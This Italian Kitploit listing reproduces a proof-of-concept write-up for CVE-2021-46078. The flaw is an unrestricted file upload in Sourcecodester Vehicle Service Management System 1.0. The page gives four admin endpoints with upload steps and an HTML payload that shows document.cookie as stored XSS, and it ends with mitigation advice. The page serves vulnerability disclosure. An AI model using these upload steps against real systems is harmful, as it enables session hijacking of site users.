Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Vehicle-Service-Management-System-Multiple-File-upload-Leads-to-Stored-Cross-Site-Scripting — CVE-2021-46078 - Una vulnerabilità di Unrestricted File Upload è presente nel Sourcecodester Vehicle Service Management System 1.0. Un attaccante remoto può caricare file dannosi che portano a una vulnerabilità di Stored Cross-Site Scripting. | Kitploit
Strumenti/GitHubGitHub/sanupl/vehicle-service-management-system-multiple-file-upload-leads-to-stored-cross-site-scripting
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebSicurezza WebPenetration TestingApprendimento e Formazione
GitHubsanupl/vehicle-service-management-system-multiple-file-upload-leads-to-stored-cross-site-scripting

Vehicle-Service-Management-System-Multiple-File-upload-Leads-to-Stored-Cross-Site-Scripting

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2021-46078 - Una vulnerabilità di Unrestricted File Upload è presente nel Sourcecodester Vehicle Service Management System 1.0. Un attaccante remoto può caricare file dannosi che portano a una vulnerabilità di Stored Cross-Site Scripting.

Vedi Repository
3 mesi faNon ancora revisionato

CVE-2021-46078

Titolo dell'exploit: Vehicle Service Management System - Caricamento 'multiplo' di file porta a Cross-Site Scripting persistente

Autore dell'exploit: SANU P.L

CVE: CVE-2021-46078

CVSS: 4.8 MEDIUM

Riferimenti:

  • https://www.plsanu.com/vehicle-service-management-system-multiple-file-upload-leads-to-stored-cross-site-scripting
  • https://nvd.nist.gov/vuln/detail/CVE-2021-46078
  • https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-46078

Descrizione:

Esiste una vulnerabilità di caricamento file senza restrizioni (Unrestricted File Upload) in Sourcecodester Vehicle Service Management System 1.0. Un attaccante remoto può caricare file dannosi che portano a una vulnerabilità di Cross-Site Scripting persistente (Stored XSS).

1. Vehicle Service Management System - 'MyAccount' (/admin/?page=user)

Exploit:

  1. Accedere al pannello di amministrazione http://localhost/vehicle_service/admin
  2. Navigare alla sezione My Account http://localhost/vehicle_service/admin/?page=user

Payload:

root@kitploit:~
<!DOCTYPE html>
<html>
<title>Stored XSS</title>
<body>
<script>
alert(document.cookie);
</script>
</body>
</html>
  1. Salvare il codice HTML precedente, ad esempio come XSS.html.
  2. Nella sezione My Account inserire tutti i dati richiesti e selezionare il file html nel campo Avatar.
  3. Fare clic sul pulsante Update.
  4. Aprire l'immagine dell'avatar in una nuova scheda.
  5. Viene eseguito il codice javascript dannoso.

2. Vehicle Service Management System - 'User List' (/admin/?page=user/manage_user)

Exploit:

  1. Accedere al pannello di amministrazione http://localhost/vehicle_service/admin
  2. Navigare alla sezione User List e fare clic sul pulsante Create New.

Payload:

root@kitploit:~
<!DOCTYPE html>
<html>
<title>Stored XSS</title>
<body>
<script>
alert(document.cookie);
</script>
</body>
</html>
  1. Salvare il codice HTML precedente, ad esempio come XSS.html.
  2. Nella pagina Create New User inserire tutti i dati richiesti e selezionare il file html nel campo Avatar.
  3. Fare clic sul pulsante Save.
  4. Aprire l'immagine dell'avatar in una nuova scheda.
  5. Viene eseguito il codice javascript dannoso.

3. Vehicle Service Management System - 'Settings-System Logo' (/admin/?page=system_info)

Exploit:

  1. Accedere al pannello di amministrazione http://localhost/vehicle_service/admin
  2. Navigare alla sezione Settings http://localhost/vehicle_service/admin/?page=system_info

Payload:

root@kitploit:~
<!DOCTYPE html>
<html>
<title>Stored XSS</title>
<body>
<script>
alert(document.cookie);
</script>
</body>
</html>
  1. Salvare il codice HTML precedente, ad esempio come XSS.html.
  2. Nella sezione Settings inserire tutti i dati richiesti e selezionare il file html nel campo System Logo.
  3. Fare clic sul pulsante Update.
  4. Aprire l'immagine System Logo in una nuova scheda.
  5. Viene eseguito il codice javascript dannoso.

4. Vehicle Service Management System - 'Settings-Website Cover' (/admin/?page=system_info)

Exploit:

  1. Accedere al pannello di amministrazione http://localhost/vehicle_service/admin
  2. Navigare alla sezione Settings http://localhost/vehicle_service/admin/?page=system_info

Payload:

root@kitploit:~
<!DOCTYPE html>
<html>
<title>Stored XSS</title>
<body>
<script>
alert(document.cookie);
</script>
</body>
</html>
  1. Salvare il codice HTML precedente, ad esempio come XSS.html.
  2. Nella sezione Settings inserire tutti i dati richiesti e selezionare il file html nel campo Website Cover.
  3. Fare clic sul pulsante Update.
  4. Aprire l'immagine Website Cover in una nuova scheda.
  5. Viene eseguito il codice javascript dannoso.

Impatto:

Un attaccante può caricare file dannosi in più endpoint, portando a Cross-Site Scripting persistente (Stored XSS).

Mitigazione:

Si consiglia di implementare quanto segue:

  • Non accettare mai un nome file e la sua estensione direttamente senza un filtro white-list.
  • Se non è necessario avere caratteri Unicode, è fortemente consigliato accettare solo caratteri alfanumerici e un solo punto come input per il nome file e l'estensione.
  • Limitare la dimensione del file a un valore massimo per prevenire attacchi di denial of service.
  • La directory di upload non deve avere alcun permesso di "esecuzione" (execute).
  • Non affidarsi solo alla validazione lato client.
Scarica lo strumento